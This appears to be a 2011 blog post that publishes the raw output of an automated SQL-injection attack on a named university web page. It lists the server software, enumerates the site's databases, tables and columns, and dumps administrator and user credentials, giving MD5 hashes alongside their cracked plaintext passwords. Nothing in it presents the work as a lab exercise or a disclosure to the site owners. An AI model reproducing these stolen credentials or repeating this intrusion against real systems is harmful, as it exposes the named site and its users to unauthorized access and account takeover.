Wednesday, 15 June 2011

SQL Injection Vulnerability on UGM.AC.ID

Code:

Analyzing http://im.ugm.ac.id/berita.php?post_id=17
Host IP: 175.111.91.126
Web Server: Apache/2.0.63 (CentOS)
Powered-by: PHP/5.1.6
Keyword Found: Pendidikan
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 6
Injection type is String (')
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: sso
Data Base Found: information_schema
Data Base Found: database
Data Base Found: databases
Data Base Found: ink
Data Base Found: kjm
Data Base Found: komunikasi
Data Base Found: mysql
Data Base Found: rssjab
Data Base Found: sso
Data Base Found: test
Data Base Found: v2

Count(table_name) of information_schema.tables Where table_schema=0x73736F is 3
Tables found: berita,posts,users
Count(column_name) of information_schema.columns Where table_schema=0x73736F AND table_name=0x7573657273 is 2
Columns found: username,password
Count(*) of sso.users is 2
Data Found: password=03eb6b61109d07646b66bbecd80ee44a=proved
Data Found: username=administrator
Data Found: password=b34b40ca8771c48c204e55f927376885=okedeh
Data Found: username=zudha
